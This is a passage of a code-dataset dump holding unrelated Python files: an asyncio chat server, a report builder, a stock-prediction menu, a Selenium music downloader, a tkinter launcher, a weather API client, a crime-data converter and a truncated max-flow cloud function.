exit.\\n\")\n break\n\n print('[AsyncioChat.on_read]Recieve:%s%s' %(line.decode('utf-8').rstrip(),'\\n'))\n self.handle_read(line)\n\n logging.debug('%s:*******end*******' %('AsyncioChat.on_read'))\n\n def set_terminator(self, term):\n \"\"\"Set the input delimiter.\n\n Can be a fixed string of any length, an integer, or None.\n \"\"\"\n if isinstance(term, str) and self.use_encoding:\n term = bytes(term, self.encoding)\n elif isinstance(term, int) and term < 0:\n raise ValueError('the number of received bytes must be positive')\n self.terminator = term\n\n def get_terminator(self):\n return self.terminator\n\n def handle_close(self):\n self._writer.close()\n\n def handle_read(self, data):\n logging.debug('%s:=======start========' %('AsyncioChat.handle_read'))\n if isinstance(data, str) and self.use_encoding:\n data = bytes(str, self.encoding)\n self.ac_in_buffer = self.ac_in_buffer + data\n\n # Continue to search for self.terminator in self.ac_in_buffer,\n # while calling self.collect_incoming_data. The while loop\n # is necessary because we might read several data+terminator\n # combos with a single recv(4096).\n\n while self.ac_in_buffer:\n lb = len(self.ac_in_buffer)\n terminator = self.get_terminator()\n if not terminator:\n # no terminator, collect it all\n self.collect_incoming_data(self.ac_in_buffer)\n self.ac_in_buffer = b''\n elif isinstance(terminator, int):\n # numeric terminator\n n = terminator\n if lb < n:\n self.collect_incoming_data(self.ac_in_buffer)\n self.ac_in_buffer = b''\n self.terminator = self.terminator - lb\n else:\n self.collect_incoming_data(self.ac_in_buffer[:n])\n self.ac_in_buffer = self.ac_in_buffer[n:]\n self.terminator = 0\n self.found_terminator()\n else:\n # 3 cases:\n # 1) end of buffer matches terminator exactly:\n # collect data, transition\n # 2) end of buffer matches some prefix:\n # collect data to the prefix\n # 3) end of buffer does not match any prefix:\n # collect data\n terminator_len = len(terminator)\n index = self.ac_in_buffer.find(terminator)\n if index != -1:\n # we found the terminator\n if index > 0:\n # don't bother reporting the empty string\n # (source of subtle bugs)\n self.collect_incoming_data(self.ac_in_buffer[:index])\n self.ac_in_buffer = self.ac_in_buffer[index+terminator_len:]\n # This does the Right Thing if the terminator\n # is changed here.\n self.found_terminator()\n else:\n # check for a prefix of the terminator\n index = find_prefix_at_end(self.ac_in_buffer, terminator)\n if index:\n if index != lb:\n # we found a prefix, collect up to the prefix\n self.collect_incoming_data(self.ac_in_buffer[:-index])\n self.ac_in_buffer = self.ac_in_buffer[-index:]\n break\n else:\n # no prefix, collect it all\n self.collect_incoming_data(self.ac_in_buffer)\n self.ac_in_buffer = b''\n logging.debug('%s:*******end*******' %('AsyncioChat.handle_read'))\n\n\n def collect_incoming_data(self, data):\n raise NotImplementedError(\"must be implemented in subclass\")\n\n def found_terminator(self):\n raise NotImplementedError(\"must be implemented in subclass\")\n\n def push(self, data):\n logging.debug('%s:=======start========' %('push'))\n logging.debug('data:%s' %(data))\n self._writer.write(data)\n logging.debug('%s:*******end*******' %('push'))\n\n# this could maybe be made faster with a computed regex?\n# [answer: no; circa Python-2.0, Jan 2001]\n# new python: 28961/s\n# old python: 18307/s\n# re: 12820/s\n# regex: 14035/s\n\ndef find_prefix_at_end(haystack, needle):\n l = len(needle) - 1\n while l and not haystack.endswith(needle[:l]):\n l -= 1\n return l\n\nclass ChatServer():\n \"\"\"\n 聊天服务器\n \"\"\"\n def __init__(self, host, port, loop):\n\n self.co_srv = None\n self._host = host\n self._port = port\n self._loop = loop\n self.users = {}\n self.main_room = ChatRoom(self)\n\n async def run_server(self):\n self.co_srv= await asyncio.start_server(self.handle_accept, self._host, self._port, loop=loop)\n print('Server started at http://%s:%s...'%(self._host, self._port))\n\n def handle_accept(self, reader, writer):\n logging.debug('%s:=======start========' %('handle_accept'))\n ChatSession(self, reader, writer, self._loop)\n logging.debug('%s:*******end********' %('handle_accept'))\n\nclass ChatSession(AsyncioChat):\n \"\"\"\n 负责和客户端通信\n \"\"\"\n\n def __init__(self, server, reader, writer, loop):\n AsyncioChat.__init__(self, reader, writer, loop)\n self.server = server\n self.set_terminator(b'\\n')\n self.data = []\n self.name = None\n self.enter(LoginRoom(server))\n\n def enter(self, room):\n #一个session属于一个 room, 互相注册,能互相引用对方\n # 从当前房间移除自身,然后添加到指定房间。\n self.leave_current_room();\n self.enter_room(room);\n\n def leave_current_room(self):\n try:\n cur_room = self.room\n except AttributeError:\n pass\n else:\n cur_room.remove(self)\n\n def enter_room(self, room):\n self.room = room\n room.add(self)\n\n def collect_incoming_data(self, data):\n # 接收客户端的数据\n self.data.append(data.decode(\"utf-8\"))\n\n def found_terminator(self):\n # 当客户端的一条数据结束时的处理\n logging.debug(\"data=%s\" % (self.data))\n line = ''.join(self.data)\n self.data = []\n try:\n self.room.handle(self, line.encode(\"utf-8\"))\n # 退出聊天室的处理\n except EndSession:\n self.handle_close()\n\n def handle_close(self):\n # 当 session 关闭时,将进入 LogoutRoom\n logging.debug(\"handle_close\")\n\n AsyncioChat.handle_close(self)\n #asynchat.async_chat.handle_close(self)\n self.enter(LogoutRoom(self.server))\n\n logging.debug(\"handle_close end\")\n\nclass CommandHandler:\n \"\"\"\n 命令处理类\n \"\"\"\n\n def unknown(self, session, cmd):\n # 响应未知命令\n # 通过 aynchat.async_chat.push 方法发送消息\n session.push(('Unknown command {} \\n'.format(cmd)).encode(\"utf-8\"))\n\n def handle(self, session, line):\n line = line.decode()\n # 命令处理\n if not line.strip():\n return\n parts = line.split(' ', 1)\n cmd = parts[0]\n try:\n line = parts[1].strip()\n except IndexError:\n line = ''\n # 通过协议代码执行相应的方法\n method = getattr(self, 'do_' + cmd, None)\n try:\n method(session, line)\n except TypeError:\n self.unknown(session, cmd)\n\nclass Room(CommandHandler):\n \"\"\"\n 包含多个用户的环境,负责基本的命令处理和广播\n \"\"\"\n\n def __init__(self, server):\n self.server = server\n self.sessions = []\n\n def add(self, session):\n # 一个用户进入房间\n self.sessions.append(session)\n\n def remove(self, session):\n # 一个用户离开房间\n self.sessions.remove(session)\n\n def broadcast(self, line):\n # 向所有的用户发送指定消息\n # 使用 asynchat.asyn_chat.push 方法发送数据\n for session in self.sessions:\n session.push(line)\n\n def do_logout(self, session, line):\n logging.debug(\"logout......\")\n # 退出房间\n raise EndSession\n\n\nclass LoginRoom(Room):\n \"\"\"\n 处理登录用户\n \"\"\"\n\n def add(self, session):\n # 用户连接成功的回应\n Room.add(self, session)\n # 使用 asynchat.asyn_chat.push 方法发送数据\n session.push(b'Connect Success')\n\n def do_login(self, session, line):\n # 用户登录逻辑\n name = line.strip()\n # 获取用户名称\n if not name:\n session.push(b'UserName Empty')\n # 检查是否有同名用户\n elif name in self.server.users:\n session.push(b'UserName Exist')\n # 用户名检查成功后,进入主聊天室\n else:\n session.name = name\n session.enter(self.server.main_room)\n\n\nclass LogoutRoom(Room):\n \"\"\"\n 处理退出用户\n \"\"\"\n\n def add(self, session):\n # 从服务器中移除\n try:\n del self.server.users[session.name]\n except KeyError:\n pass\n\n\nclass ChatRoom(Room):\n \"\"\"\n 聊天用的房间\n \"\"\"\n\n def add(self, session):\n # 广播新用户进入\n session.push(b'Login Success')\n self.broadcast((session.name + ' has entered the room.\\n').encode(\"utf-8\"))\n self.server.users[session.name] = session\n Room.add(self, session)\n\n def remove(self, session):\n # 广播用户离开\n Room.remove(self, session)\n self.broadcast((session.name + ' has left the room.\\n').encode(\"utf-8\"))\n\n def do_say(self, session, line):\n # 客户端发送消息\n self.broadcast((session.name + ': ' + line + '\\n').encode(\"utf-8\"))\n\n def do_look(self, session, line):\n # 查看在线用户\n session.push(b'Online Users:\\n')\n for other in self.sessions:\n session.push((other.name + '\\n').encode(\"utf-8\"))\n\nif __name__ == '__main__':\n try:\n loop = asyncio.get_event_loop()\n\n s = ChatServer('127.0.0.1','8000',loop)\n loop.run_until_complete(s.run_server())\n loop.run_forever()\n except KeyboardInterrupt:\n print(\"chat server exit\")","sub_path":"text-chat/asyncio_server_monofile.py","file_name":"asyncio_server_monofile.py","file_ext":"py","file_size_in_byte":12395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481771185","text":"#!/usr/bin/env python3\nimport json\n\nconfig=eval(open(\"../run.json\",\"r\").read())\n\nsamples=sorted(list(config['project']['units'].keys()))\npairs=sorted(list(config['project']['pairs'].keys()))\npfamily=config['project']['pfamily']\npipeline=config['project']['pipeline']\nif pfamily==\"rnaseq\":\n qcfolder=\"QC\"\n\nD=dict()\n\nD['ProjectSummary']=dict()\nL=list()\nL.append(\"../run.json\")\nD['ProjectSummary']['include']=L\nD['QCWorkflow']=dict()\nL=list()\nL.append(\"../Reports/initialqcrnaseq.png\")\nD['QCWorkflow']['include']=L\nD['ExomeWorkflow']=dict()\nL=list()\nL.append(\"../Reports/rnaseq.png\")\nD['ExomeWorkflow']['include']=L\nD['MultiQC']=dict()\nL=list()\nL.append(\"../Reports/multiqc_report.html\")\nD['MultiQC']['include']=L\n\n\nL=list()\nfor s in samples:\n L.append(\"../rawQC/\"+s+\".R1_fastqc.html\")\n L.append(\"../rawQC/\"+s+\".R2_fastqc.html\") \n\nD['RawFastQC']=dict()\nD['RawFastQC']['include']=L\n\nwith open(config['project']['workpath']+'/Reports/report.json', 'w') as F:\n json.dump(D, F, sort_keys = True, indent = 4,ensure_ascii=False)\n\nF.close()\n\n\n","sub_path":"Results-template/Reports/make.json.py","file_name":"make.json.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625026997","text":"\nimport os\nimport parameters\nimport stock_prediction\nimport test\nimport train\n\n\ndef main():\n while True:\n print(\"LSTM stock prediction\")\n print(\"Please, enter the index you would like to predict\")\n ind = input(\"Index: \").upper()\n ticker = ind\n if ind == 'AMD':\n print('Enter 1 if you want to train on prepared data')\n print('Enter 2 if you want to train on raw data')\n val = input('Val: ').upper()\n if val == '1':\n TRAIN_RAW = True\n else:\n TRAIN_RAW = False\n\n print(\"Enter the day which you want to predict after today (e.g. 1 means the next day)\")\n day = input(\"Day: \").upper()\n LOOKUP_STEP = day\n print(\"Starting training the model\")\n os.system(\"python train.py\")\n print(\"Training is finished. Enter 'test' to start testing\")\n t = input(\"\")\n if t == 'test':\n os.system(\"python test.py\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"LSTM2/LSTMPredictionMain.py","file_name":"LSTMPredictionMain.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542834471","text":"from selenium import webdriver\nimport time\nimport json\n\nurl = \"https://www.mewpot.com/users/sign_in\"\n\nemotion = \"잔잔\"\n\noptions = webdriver.ChromeOptions()\noptions.headless = True # headless Chrome 구현(브라우저 키지 않아��� 알아서 내부적으로 돌아감)\noptions.add_argument(\"window-size=1920x1080\")\noptions.add_argument(\"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\")\nprefs = {'download.default_directory': 'C:\\\\Users\\\\박규한\\\\Desktop\\\\MusicCrawling\\\\{}'.format(emotion)}\noptions.add_experimental_option('prefs', prefs)\nbrowser = webdriver.Chrome(options=options)\nbrowser.maximize_window()\n\nbrowser.get(url)\n\nwith open(\"information.json\") as json_file:\n json_data = json.load(json_file)\n # 로그인 정보 입력\n browser.find_element_by_class_name(\"login_input_email\").send_keys(json_data[\"id\"])\n browser.find_element_by_class_name(\"login_input_password\").send_keys(json_data[\"password\"])\n browser.find_element_by_class_name(\"login_btn\").click()\n\n# 각각의 버튼 식별하는 요소 찾기\nfree_down_selector = \"#simple-modal > div.modal-dialog > div > div.modal-body > div > div > a:nth-child(2)\"\ndown_selector = \"#simple-modal > div.modal-dialog > div > div.modal-body > a.button.blue.mb-5.medium.tag-button.pay_catnip\"\nclose_selector = \"#simple-modal > div.modal-dialog > div > div.modal-footer > button\"\n\n# emotions = [\"Smile\", \"잔잔\", \"Surprise\", \"Sad\", \"Fear\"]\n\nfor page in range(1, 3):\n url = \"https://www.mewpot.com/search/song?page={0}&situation%5B%5D={1}\".format(page, emotion)\n browser.get(url)\n time.sleep(2)\n browser.execute_script(\"window.scrollTo(0, 720)\")\n downloads = browser.find_elements_by_css_selector('td.function_cell > div > div:nth-child(3) > a > i')\n print(\"현재 페이지 :\", page)\n for download in downloads:\n download.click() # 다운로드(구름) 버튼\n time.sleep(1)\n try:\n browser.find_element_by_css_selector(free_down_selector).click() # 무료 음원 다운로드 버튼\n except(Exception):\n browser.find_element_by_css_selector(down_selector).click() # 곡 구매 버튼\n finally:\n time.sleep(1)\n browser.find_element_by_css_selector(close_selector).click() # close 버튼\n time.sleep(1)\n print(\"download !\")\n\nprint(\"download clear !\")\nbrowser.quit() # 실행종료\n\n\n\n\n\n\n\n","sub_path":"BGM.py","file_name":"BGM.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"477264939","text":"# Исходный список содержит положительные и отрицательные числа. Требуется положительные\n# поместить в один список, а отрицательные - в другой.\n\n\ndef divide(array):\n positive = []\n negative = []\n for i in array:\n if i > 0:\n positive.append(i)\n elif i < 0:\n negative.append(i)\n return positive, negative\n \n \narr = [1, 2, 3, 4, 5, 6, 11, -1, -2, -3, -7, -20, -22]\npos, neg = divide(arr)\nprint(pos)\nprint(neg)","sub_path":"Desktop/bootcamp/week2/practice/tuesday/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536071990","text":"import os\nimport tkinter as tk\n\ndef sortir():\n global root\n root.destroy()\n\ndef launch_0():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 0\"+d)\n\ndef launch_1():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 1\"+d)\n\ndef launch_2():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 2\"+d)\n\ndef launch_3():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 3\"+d)\n\ndef launch_4():\n sortir()\n global debug\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 4\"+d)\n\ndef launch_5():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 5\"+d)\n\ndef launch_6():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 6\"+d)\n\ndef top_frame(root):\n frame = tk.Frame(root)\n button = tk.Button(frame, text=\"Fonctionnement normal\", command=launch_0, activebackground=\"grey\",height=2)\n button.pack(fill=\"both\")\n frame.pack(side=\"top\",fill=\"both\")\n\ndef middle_frame(root):\n frame = tk.Frame(root)\n frame2 = tk.Frame(root)\n frame3 = tk.Frame(root)\n\n button1 = tk.Button(frame, text=\"Bug n°1\", command=launch_1, activebackground=\"grey\",height=2,width=20)\n button2 = tk.Button(frame, text=\"Bug n°2\", command=launch_2, activebackground=\"grey\",height=2,width=20)\n button1.pack(side=\"left\")\n button2.pack(side=\"left\")\n frame.pack(side=\"top\")\n\n button3 = tk.Button(frame2, text=\"Bug n°3\", command=launch_3, activebackground=\"grey\",height=2,width=20)\n button4 = tk.Button(frame2, text=\"Bug n°4\", command=launch_4, activebackground=\"grey\",height=2,width=20)\n button3.pack(fill=\"both\",side=\"left\")\n button4.pack(fill=\"both\",side=\"left\")\n frame2.pack(side=\"top\")\n\n button5 = tk.Button(frame3, text=\"Bug n°5\", command=launch_5, activebackground=\"grey\",height=2,width=20)\n button6 = tk.Button(frame3, text=\"Bug n°6\", command=launch_6, activebackground=\"grey\",height=2,width=20)\n button5.pack(side=\"left\")\n button6.pack(side=\"right\")\n frame3.pack(side=\"top\")\n\ndef lower_frame(root):\n global debug\n frame= tk.Frame(root)\n debug = tk.IntVar()\n c1 = tk.Checkbutton(frame, text='Activer fenêtre de déboguage',variable=debug, onvalue=1, offvalue=0)\n c1.pack()\n frame.pack()\n\n\n\ndef main():\n global root\n root = tk.Tk()\n root.protocol(\"WM_DELETE_WINDOW\", sortir)\n root.title(\"Simulation Ascenseur\")\n root.geometry(\"300x200+500+200\")\n root.description=\"Lancement simulation ascenseur\"\n root.iconbitmap(\"elevator.ico\")\n\n top_frame(root)\n middle_frame(root)\n lower_frame(root)\n\n\n\n\n\n\n\n root.mainloop()\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226846370","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nfrom xy.device import Device\nfrom time import sleep\n\nfrom numpy.random import random\nfrom numpy import floor\n\n\nPENUP = 140\nPENDOWN = 160\nXMAX = 150\nYMAX = 150\nTTY = '/dev/ttyUSB0'\n\n\n\ndef main():\n\n with Device(\n TTY,\n penup=PENUP,\n pendown=PENDOWN,\n verbose=True,\n min_delay=200,\n max_delay=1200\n ) as device:\n\n device.penup()\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=True)\n\n device.pendown()\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=False)\n device.penup()\n\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=True)\n\n device.pendown()\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=False)\n device.penup()\n\n device.move(0,0,fast=True)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317562550","text":"from .rest import HTTPClient\nfrom gc import collect\nfrom urllib.parse import unquote, quote\nfrom re import search\n\nclass Client:\n __slots__ = ('http',)\n\n def __init__(self, session=None, format: str = 'C', locale: str = 'en-US', max_cache_size: int = 15):\n if format.upper() not in ('C', 'F'):\n raise TypeError('Invalid format.')\n \n self.http = HTTPClient(max_cache_size, format, locale, session)\n\n @property\n def format(self) -> str:\n return search('&weadegreetype=([^&]+)', self.http._query_params)[0][15:]\n\n @format.setter\n def format(self, value: str) -> None:\n if value.upper() not in ('C', 'F'):\n raise TypeError('Invalid format.')\n self.http._query_params = self.http._query_params.replace(f'&weadegreetype={self.format}', f'&weadegreetype={value}')\n\n @property\n def locale(self) -> str:\n return unquote(search('&culture=([^&]+)', self.http._query_params))[0][9:]\n\n @locale.setter\n def locale(self, value: str) -> None:\n self.http._query_params = self.http._query_params.replace(f'&culture={self.locale}', f'&culture={quote(value)}')\n\n async def find(self, location: str) -> \"Weather\":\n \"\"\" Finds a weather forecast from a location. \"\"\"\n if (not location) or (not isinstance(location, str)):\n raise TypeError('location must be a string.')\n return await self.http.request(location)\n\n @property\n def cache(self) -> \"Cache\":\n \"\"\" Returns the cache. \"\"\"\n if self.closed:\n return\n return self.http.cache\n \n @cache.setter\n def cache(self, new_cache: dict) -> None:\n \"\"\" Modifies the cache. \"\"\"\n if self.closed:\n return\n elif new_cache is None:\n return self.cache.clear()\n elif not isinstance(new_cache, dict):\n raise TypeError('Invalid type for setting the client\\'s cache.')\n\n new_is_empty = not len(new_cache.keys())\n for k, v in new_cache.items():\n self.http.cache[k] = v\n \n if new_is_empty:\n collect()\n\n @property\n def closed(self) -> bool:\n \"\"\" Returns if the client is closed or not. \"\"\"\n return self.http.closed\n\n async def close(self) -> None:\n \"\"\" Closes the wrapper. \"\"\"\n if not self.closed:\n await self.http.close()\n\n def __repr__(self) -> str:\n return f\"\"","sub_path":"python_weather/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"194797422","text":"from pandas import *\nimport numpy as num\nfrom pysal import *\nimport os, glob\nfrom osgeo import ogr\nimport csv\nfrom pyGDsandbox.dataIO import df2dbf, dbf2df\nimport uuid\nfrom pyproj import Proj, transform\nfrom shapely.geometry import Polygon, shape\nfrom osgeo import ogr, osr\nimport fiona\n\n#read in data from geodatabase\ndriver = ogr.GetDriverByName(\"ESRI Shapefile\")\nnormanlist = glob.glob('*****.dbf')\nnorman=glob.glob('*****.shp')\n\nnlist = []\nfor m,n in zip(normanlist, range(len(normanlist))):\n\ta=normanlist[n].rfind(\"Incidents\")\n\tb=normanlist[n].rfind(\".dbf\")\n\tnlist.append(m[a:b])\n\ntable1=read_excel('*****.xls', 'Sheet1', index_col=None, na_values=['NA']).fillna(0)\n\n\nfor x, y, z in zip(normanlist, nlist, norman):\n\tdb= pysal.open(x, 'r')\n\td = {col: db.by_col(col) for col in db.header}\n\ttable1=DataFrame(d).fillna(0)\n\twgs84X=[]\n\twgs84Y=[]\n\tinproj=Proj(\"+proj=lcc +lat_1=33.93333333333333 +lat_2=35.23333333333333 +lat_0=33.33333333333334 +lon_0=-98 +x_0=600000.0000000001 +y_0=0 +ellps=GRS80 +datum=NAD83 +to_meter=0.3048006096012192 +no_defs\", preserve_units = True)\n\toutProj = Proj('+proj=utm +zone=15 +ellps=WGS84 +datum=WGS84 +units=m +no_defs ', preserve_units = True)\n\tfor pol in fiona.open(z):\n\t\tif str(type(pol['geometry']))==\"\":\n\t\t\twgs84X.append(0)\n\t\t\twgs84Y.append(0)\n\t\telse:\n\t\t\tmyX=pol['geometry']['coordinates'][0]\n\t\t\tmyY=pol['geometry']['coordinates'][1]\n\t\t\ta=transform(inproj,outProj,myX, myY)\n\t\t\twgs84X.append(a[0])\n\t\t\twgs84Y.append(a[1])\n\n\t\n\tnewtable1=DataFrame({})\n\tnewtable1[\"incid\"] = table1[\"incident_n\"]\n\tnewtable1[\"Reported_address\"]=num.nan\n\t#newtable1[\"incid\"] = Series(range(1, len(newtable2)+1)).unique()\n\t#newtable1[\"Location_name\"]=num.nan\n\t#for i in range(len(table1[\"incident_n\"])):\n\tnewtable1[\"Reported_address\"] = table1[\"CVaddress\"] #str(table1[\"CVaddress\"][i])+\",Norman,OK\"\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tif newtable1[\"Reported_address\"][i] != '' and newtable1[\"Reported_address\"][i] != 0 and newtable1[\"Reported_address\"][i].strip().find(\"UNKNOWN\") == -1 and newtable1[\"Reported_address\"][i] != num.nan:\n\t\t\tnewtable1[\"Reported_address\"][i]=str(newtable1[\"Reported_address\"][i].strip())+\",NORMAN,OK\"\n\t\telse:\n\t\t\tnewtable1[\"Reported_address\"][i]=\"NORMAN,OK\"\n\tnewtable1[\"Incident_date\"]=num.nan\n\tnewtable1[\"Report_date\"]=num.nan\n\tnewtable1[\"Incident_time\"]=num.nan\n\tnewtable1[\"Report_time\"]=num.nan\n\t\n\tIncident_date=[0]*len(table1[\"CVaddress\"])\n\tReport_date=[0]*len(table1[\"CVaddress\"])\n\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tIncident_date[i] = table1[\"date_1\"][i][0:10]\n\t\tReport_date[i] = table1[\"date_repor\"][i][0:10]\n\t\n\tnewtable1[\"Incident_date\"] = Incident_date\n\tnewtable1[\"Report_date\"] = Report_date\n\t\n\tIncident_time=[0]*len(table1[\"CVaddress\"])\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tIncident_time[i] = table1[\"date_1\"][i][11:]\n\t\n\tnewtable1[\"Incident_time\"]=Incident_time\n\n\tReport_time=[0]*len(table1[\"CVaddress\"])\t\t\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tIncident_time[i] = table1[\"date_repor\"][i][11:]\n\t\n\tnewtable1[\"Report_time\"]=Incident_time\n\n\tnewtable1[\"IBR\"] = table1[\"NIBRSCode\"]\n\tnewtable1[\"IBR_description\"] = table1[\"NIBRSDesc\"]\t\n\tnewtable1[\"Police_Department_Code\"]= table1[\"Offense\"]\n\tnewtable1[\"PD_description\"] = table1[\"OffenseDes\"]\n\t#if \"tiger_X\" in db.header:\n\t#\tnewtable1[\"Latitude\"] = table1[\"tiger_X\"]\n\t#\tnewtable1[\"Longitude\"] = table1[\"tiger_Y\"]\n\t#else:\n\tnewtable1[\"Latitude\"] = wgs84Y\n\tnewtable1[\"Longitude\"] = wgs84X\n\tnewtable1[\"State_Statute_Number\"]=num.nan\n\tnewtable1[\"State_Statute_Literal\"]=num.nan\n\t\n\tnewtable1[\"Global_ID\"]=num.nan\n\tnewtable1[\"flag_geocode\"]=num.nan\n\n\tReport_date=[0]*len(table1[\"CVaddress\"])\n\tIncident_date=[0]*len(table1[\"CVaddress\"])\n\tReport_time=[0]*len(table1[\"CVaddress\"])\n\tIncident_time=[0]*len(table1[\"CVaddress\"])\n\n\tfor i in range(len(newtable1[\"Global_ID\"])):\n\t\t\n\t\tReport_date[i]=str(newtable1[\"Report_date\"][i])[0:4]+\"-\"+str(newtable1[\"Report_date\"][i])[5:7]+\"-\"+str(newtable1[\"Report_date\"][i])[8:]\n\t\tIncident_date[i]=str(newtable1[\"Incident_date\"][i])[0:4]+\"-\"+str(newtable1[\"Incident_date\"][i])[5:7]+\"-\"+str(newtable1[\"Incident_date\"][i])[8:]\n\n\t\tif newtable1[\"Incident_time\"][i] != num.nan:\n\t\t\tIncident_time[i]=str(newtable1[\"Incident_time\"][i])[0:2]+\":\"+str(newtable1[\"Incident_time\"][i])[3:5]+\":\"+str(newtable1[\"Incident_time\"][i])[6:]\n\t\telse:\n\t\t\tIncident_time[i]=num.nan\n\t\tif newtable1[\"Report_time\"][i] != num.nan:\n\t\t\tReport_time[i]=str(newtable1[\"Report_time\"][i])[0:2]+\":\"+str(newtable1[\"Report_time\"][i])[3:5]+\":\"+str(newtable1[\"Report_time\"][i])[6:]\n\t\telse:\n\t\t\tReport_time[i]=num.nan\n\t\t#newtable1[\"Global ID\"][i]=str(uuid.uuid4())\n\t\n\tnewtable1[\"Report_date\"]=Report_date\n\tnewtable1[\"Incident_date\"]=Incident_date\n\tnewtable1[\"Report_time\"]=Report_time\n\tnewtable1[\"Incident_time\"]=Incident_time\n\n\tnewtable1[\"Global_ID\"]=range(len(newtable1[\"Global_ID\"]))\n\tnewtable1=newtable1.replace(0,num.nan)\n\tnewtable1=newtable1.replace(\"0\",num.nan)\n\tnewtable1=newtable1.replace(\"00\",num.nan)\n\tnewtable1=newtable1.replace(\"\",num.nan)\n\t#newtable1=newtable1.sort([\"Report_date\"])\n\t#newtable1[\"incid\"] = Series(range(1, len(newtable1)+1)).unique()\n\tnewtable1=newtable1[[\"Global_ID\", \"Reported_address\", \"Incident_date\", \"Incident_time\", \"Report_date\", \"Report_time\", \"Latitude\", \"Longitude\", \"IBR\", \"IBR_description\", \"Police_Department_Code\", \"PD_description\", \"State_Statute_Number\", \"State_Statute_Literal\",\"flag_geocode\"]]\n\tnewtable1.to_csv('*****.csv', index=False)\n\t#df2dbf(newtable1, x)\n\n","sub_path":"1norman.py","file_name":"1norman.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453806388","text":"\"\"\"Module for maximum flows.\"\"\"\n\n\nimport functools\nimport os\n\nfrom flask import jsonify\nfrom itsdangerous import Signer\n\nfrom ortools.graph.python.max_flow import SimpleMaxFlow\n\n\ndef request_wrapper(original_func=None,\n allowed_methods=frozenset(['GET', 'PUT', 'OPTIONS', 'POST',\n 'DELETE'])):\n def _decorate(func):\n @functools.wraps(func)\n def wrapped_func(request):\n # Allowed methods\n if request.method not in allowed_methods:\n return jsonify({'status': 'error',\n 'message': 'Method not allowed',\n 'data': None}), 403\n\n # CORS\n CORS_ORIGINS = os.environ['CORS_ORIGINS'].split(';')\n origin = request.headers.get('origin')\n headers = {}\n if '*' in CORS_ORIGINS:\n headers['Access-Control-Allow-Origin'] = '*'\n elif origin and origin in CORS_ORIGINS:\n headers['Access-Control-Allow-Origin'] = origin\n if len(CORS_ORIGINS) > 1 and '*' not in CORS_ORIGINS:\n headers['Vary'] = 'Origin'\n\n if request.method == 'OPTIONS':\n headers = {\n **headers,\n 'Access-Control-Allow-Methods': allowed_methods,\n 'Access-Control-Allow-Headers': ['Content-Type',\n 'x-api-key'],\n 'Access-Control-Max-Age': '3600'\n }\n return ('', 204, headers)\n\n # API token\n api_key = request.headers.get('X-API-KEY')\n if api_key is None:\n return jsonify({'status': 'error',\n 'message': 'Missing \"x-api-key\" header',\n 'data': None}), 401\n\n try:\n Signer(os.environ['SECRET_KEY']).unsign(api_key)\n except Exception:\n return jsonify({'status': 'error',\n 'message': 'Invalid access token',\n 'data': None}), 401\n\n # Run function\n try:\n resp, status = func(request)\n return jsonify(resp), status, headers\n except Exception as e:\n return jsonify({'status': 'error',\n 'message': str(e),\n 'data': None}), 500, headers\n\n return wrapped_func\n\n if original_func:\n return _decorate(original_func)\n\n return _decorate\n\n\n@request_wrapper(allowed_methods=['OPTIONS', 'POST'])\ndef maximum_flows(request):\n \"\"\"Solve maximum flow optimization problem.\n\n Args:\n data (dict): Input data as defined in the endpoint.\n\n References:\n https://developers.google.com/optimization/flow/maxflow\n \"\"\"\n # Get inputs\n print('Starting maximum flow optimization...')\n data = request.get_json()['data']\n start_nodes = [arc['startNodeId'] for arc in data['arcs']]\n end_nodes = [arc['endNodeId'] for arc in data['arcs']]\n capacities = [arc['capacity'] for arc in data['arcs']]\n source_node = [n['id'] for n in data['nodes'] if n['type'] == 'Source'][0]\n sink_node = [n['id'] for n in data['nodes'] if n['type'] == 'Sink'][0]\n\n # Map 